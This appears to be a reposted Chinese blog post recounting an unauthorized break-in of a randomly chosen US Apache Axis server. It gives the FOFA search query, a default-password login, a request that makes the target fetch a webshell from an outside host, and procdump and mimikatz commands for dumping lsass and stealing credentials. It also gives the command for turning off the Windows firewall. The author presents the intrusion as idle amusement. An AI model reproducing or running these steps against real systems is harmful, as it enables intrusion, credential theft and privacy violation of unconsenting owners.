绕过某数字杀软拿下某目标站
2023-1-30 08:31:20 Author: 潇湘信安(查看原文) 阅读量:38 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

日常摸鱼,无聊,想搞几台机器玩一玩,在网上找目标,找老外的机器下手

目标

从老洞捡些漏网之鱼,没准还会有意外收获
country="US" && app="APACHE-Axis"

目标出现

还是熟悉的页面,熟悉的端口,然后尝试默认口令登录,ok, 这下稳了

先搜集一下信息

不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了

再上传包就多此一举了,可以直接利用,找了一圈没发现遗留的马儿,找绝对路径自己上传

C:/elocker/webapps/admin/WEB-INF/classes

顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs

执行命令

看结果失败了

反弹shell

难道是因为在url里执行,导致powershell命令没有执行成功吗?带着这个疑问 反弹shell尝试一下

结果还是失败,可以确定,应该是有waf

写入shell

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp
查看一下进程
通过对比发现某安全卫士

绕过杀软

通过测试发现,最基本的net user也执行不了,摆在面前的路只有2条,果断选择抓密码,简单有效,mimikatz不免杀不可直接用。

做免杀抓密码

这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码,上传procdump64.exe并下载lsass.dmp

再在本地解析文件
# 导出为lsass.dump文件procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 把lsass.dmp放在mimikatz目录利用mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords fullexit
得到hash,破解密码

登录服务器

查看防火墙状态

Netsh Advfirewall show allprofiles
关闭防火墙
NetSh Advfirewall set allprofiles state off
内网IP,需搭建代理

登录云桌面,发现意外惊喜

现机主运行了 telegram,嘿嘿

文章来源:先知社区(newlifes)原文地址:https://xz.aliyun.com/t/9856

关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247500681&idx=1&sn=cdb21e058ba6e314259a12eb57c6d913&chksm=cfa5679af8d2ee8cae9ac98017e8c153363fdd257e6b9bf39e1fdc40a5bf32c61def5285507b#rd
如有侵权请联系:admin#unsafe.sh